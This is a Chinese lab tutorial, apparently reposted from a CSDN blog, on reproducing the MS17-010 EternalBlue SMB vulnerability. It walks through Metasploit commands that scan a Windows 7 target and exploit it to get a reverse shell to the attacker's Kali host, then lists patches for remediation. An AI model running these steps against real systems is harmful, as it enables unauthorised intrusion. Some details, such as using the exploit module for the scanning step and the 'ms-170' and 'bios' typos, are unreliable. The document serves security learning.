本文讲解有关MS17-010(永恒之蓝)漏洞分析与复现
1.永恒之蓝简介
1、永恒之蓝介绍:
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
2、漏洞原理:
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
3、影响版本:
目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
————————————————
版权声明:本文为CSDN博主「未完成的歌~」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_43531669/article/details/120375506
2.靶场环境准备
靶机:windows 7 Service Pack1
攻击机:Kali GNU/Linux Rolling
3.漏洞复现
1.检查靶机(win7)的防火墙是否关闭
2.检查靶机(win7)开启远程桌面
3.开始攻击:执行漏洞扫描(包括探测445端口和扫描永恒之蓝ms-170漏洞)
可以看到ms170漏洞端口445目前是开启状态,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。
使用MSF的永恒之蓝漏洞模块,对靶机进行扫描
打开MSF:msfconsole
搜索 ms17-010 代码:search ms17_010
从扫描结果可以看出,结果里得到一些工具,其中:
auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
本次流程是先扫描探测漏洞,然后进行漏洞利用。
使用ms-170进行漏洞扫描,流程如下:
1.使用模块use exploit/windows/smb/ms17_010_eternalblue
2.设置靶机ip set rhosts 192.168.3.121
3.设置靶机端口 set rport 445(默认就是445,如果nmap探测bios端口不是445的话,请变更)
输入show options可查看配置
然后输入exploit或者run,执行模块
可以看到扫描结果中:Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601
和靶场的操作系统是完全吻合的。
下一步:漏洞利用,使用ms17-010攻击模块,对靶机进行攻击
之前使用的是扫描模块auxiliary/scanner/smb/smb_ms17_010
现在使用漏洞利用模块exploit/windows/smb/ms17_010_eternalblue
1.use exploit/windows/smb/ms17_010_eternalblue
2.设置靶机ip和攻击机ip(接收反弹的shell)
set rhosts 192.168.3.121 靶机ip
set lhost 192.168.3.50 攻击机kali ip
set lport 903 攻击机kali 监听端口
然后输入show option查看配置
执行攻击:exploit 或 run
可以看到已经在kali机上生成一个靶机的shell交互界面
输入ipconfig
数字正常显示,但是部分英文字符乱码,此时输入chcp 65001 可解决乱码问题
到此,永恒之蓝漏洞复现完毕,下一步可以进行内网渗透,横向信息收集等
4.漏洞修复方案
1.关闭bios服务,或开启防火墙,屏蔽服务端口
2.给系统打上永恒之蓝的漏洞修复补丁
MS17010补丁列表
不同版本的操作系统对应的MS17-010补丁编号如下
winxp特别补丁KB4012598
winxp3 32位 Security Update for Windows XP SP3 (KB4012598)
winxp2 64位 Security Update for Windows XP SP2 for x64-based Systems (KB4012598)
win2003特别补丁KB4012598
2003SP2 32位 Security Update for Windows Server 2003 (KB4012598)
2003SP2 64位 Security Update for Windows Server 2003 for x64-based Systems (KB4012598)
win2008R2补丁 KB4012212、KB4012215
March, 2017 Security Only Quality Update for Windows Server 2008 R2 for x64-based Systems (KB4012212)
March, 2017 Security Monthly Quality Rollup for Windows Server 2008 R2 for x64-based Systems (KB4012215)
win7补丁 KB4012212、KB4012215
win7 32位
March, 2017 Security Only Quality Update for Windows 7 (KB4012212)
March, 2017 Security Monthly Quality Rollup for Windows 7 (KB4012215)
win7 64位
March, 2017 Security Only Quality Update for Windows 7 for x64-based Systems (KB4012212)
March, 2017 Security Monthly Quality Rollup for Windows 7 for x64-based Systems (KB4012215)
win10 1607补丁 KB4013429
win10 1607 32位
Cumulative Update for Windows 10 Version 1607 (KB4013429)
win10 1607 64位
Cumulative Update for Windows 10 Version 1607 for x64-based Systems (KB4013429)
win2012R2补丁 KB4012213、KB4012216
March, 2017 Security Only Quality Update for Windows Server 2012 R2 (KB4012213)
March, 2017 Security Monthly Quality Rollup for Windows Server 2012 R2 (KB4012216)
win2016补丁 KB4013429
Cumulative Update for Windows Server 2016 for x64-based Systems (KB4013429)
版权归原作者 sinat_27757177 所有, 如有侵权,请联系我们删除。